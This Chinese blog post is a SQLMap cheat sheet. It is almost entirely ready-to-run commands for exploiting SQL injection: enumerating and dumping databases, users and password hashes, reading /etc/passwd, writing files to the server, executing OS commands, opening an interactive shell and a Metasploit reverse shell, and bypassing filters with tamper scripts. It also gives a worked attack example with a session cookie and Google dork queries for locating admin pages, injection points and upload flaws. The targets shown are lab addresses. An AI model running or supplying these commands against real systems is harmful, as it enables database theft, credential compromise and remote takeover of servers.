转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84927643

SQLMap的用法记录

******************基本步骤***************

sqlmap.py -u "http://192.168.109.139/news?id=1" --current-user #获取当前用户名称
sqlmap.py -u "http://192.168.109.139/news?id=1" --current-db #获取当前数据库名称
sqlmap.py -u "http://192.168.109.139/news?id=1" --tables -D "db_name" #列表名
sqlmap.py -u "http://192.168.109.139/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #列字段
sqlmap.py -u "http://192.168.109.139/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 #获取字段内容
******************信息获取****************** 
sqlmap.py -u "http://192.168.109.139/news?id=1" --smart --level 3 --users # smart 智能 level 执行测试等级
sqlmap.py -u "http://192.168.109.139/news?id=1" --dbms "Mysql" --users # dbms 指定数据库类型
sqlmap.py -u "http://192.168.109.139/news?id=1" --users #列数据库用户
sqlmap.py -u "http://192.168.109.139/news?id=1" --dbs#列数据库
sqlmap.py -u "http://192.168.109.139/news?id=1" --passwords #数据库用户密码
sqlmap.py -u "http://192.168.109.139/news?id=1" --passwords-U root -v 0 #列出指定用户数据库密码
sqlmap.py -u "http://192.168.109.139/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 #列出指定字段,列出 20 条
sqlmap.py -u "http://192.168.109.139/news?id=1" --dump-all -v 0 #列出所有数据库所有表
sqlmap.py -u "http://192.168.109.139/news?id=1" --privileges #查看权限
sqlmap.py -u "http://192.168.109.139/news?id=1" --privileges -U root #查看指定用户权限
sqlmap.py -u "http://192.168.109.139/news?id=1" --is-dba -v 1 #是否是数据库管理员
sqlmap.py -u "http://192.168.109.139/news?id=1" --roles #枚举数据库用户角色
sqlmap.py -u "http://192.168.109.139/news?id=1" --udf-inject #导入用户自定义函数(获取系统权限!)
sqlmap.py -u "http://192.168.109.139/news?id=1" --dump-all --exclude-sysdbs -v 0 #列出当前库所有表
sqlmap.py -u "http://192.168.109.139/news?id=1" --union-cols #union 查询表记录
sqlmap.py -u "http://192.168.109.139/news?id=1" --cookie "COOKIE_VALUE" #cookie 注入
sqlmap.py -u "http://192.168.109.139/news?id=1" -b #获取 banner 信息
sqlmap.py -u "http://192.168.109.139/news?id=1" --data "id=3" #post 注入
sqlmap.py -u "http://192.168.109.139/news?id=1" -v 1 -f #指纹判别数据库类型
sqlmap.py -u "http://192.168.109.139/news?id=1" --proxy"http://127.0.0.1:8118" #代理注入
sqlmap.py -u "http://192.168.109.139/news?id=1"--string"STRING_ON_TRUE_PAGE" #指定关键词
sqlmap.py -u "http://192.168.109.139/news?id=1" --sql-shell #执行指定 sql 命令
sqlmap.py -u "http://192.168.109.139/news?id=1" --file /etc/passwd  #必须为dbs权限
sqlmap.py -u "http://192.168.109.139/news?id=1" --file-write 本地文件路径 file-dest 目标路径  #必须为dbs权限(可将本地的某个文件写入到目标路径下)
sqlmap.py -u "http://192.168.109.139/news?id=1" --os-cmd=whoami #执行系统命令
sqlmap.py -u "http://192.168.109.139/news?id=1" --os-shell #系统交互 shell
sqlmap.py -u "http://192.168.109.139/news?id=1" --os-pwn #反弹 shell
sqlmap.py -u "http://192.168.109.139/news?id=1" --reg-read #读取 win 系统注册表
sqlmap.py -u "http://192.168.109.139/news?id=1" --dbs-o "sqlmap.log" #保存进度
sqlmap.py -u "http://192.168.109.139/news?id=1" --dbs -o "sqlmap.log" --resume #恢复已保存进度
sqlmap.py -u "http://192.168.109.139/news?id=1" --msf-path=/opt/metasploit3/msf2 --os-pwn 反弹 shell 需 metasploit 路径
sqlmap.py -u "http://192.168.109.139/news?id=1" --tamper "base64encode.py" 加载脚本(可利用绕过注入限制)
sqlmap.py -u "http://192.168.109.139/news?id=1" --batch --tamper "base64encode.py" 加载脚本(可利用绕过注入限制)
sqlmap -g "google 语法" --dump-all --batch #google 搜索注入点自动 跑出所有字段
sqlmap.py -u "http://192.168.109.139/news?id=1" --forms  #post提交方式注入
sqlmap.py -r 本地数据包路径 #post提交方式注入

攻击实例

sqlmap.py -u "http://192.168.109.139/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password

谷歌黑客语法

  • site:可以限制你搜索范围的域名.
  • inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.
  • intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题、URL等的文字)
  • intitle: 查包含关键词的页面,一般用于社工别人的webshell密码
  • filetype:搜索文件的后缀或者扩展名
  • intitle:限制你搜索的网页标题.
  • link: 可以得到一个所有包含了某个指定URL的页面列表.

查找后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username
查找可注入点:site:域名 inurl:aspx|jsp|php|asp
查找上传漏洞:site:域名 inurl:file|load|editor|Files
找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
存在的数据库:site:域名 filetype:mdb|asp|#
查看脚本类型:site:域名 filetype:asp/aspx/php/jsp
迂回策略入侵:inurl:cms/data/templates/images/index/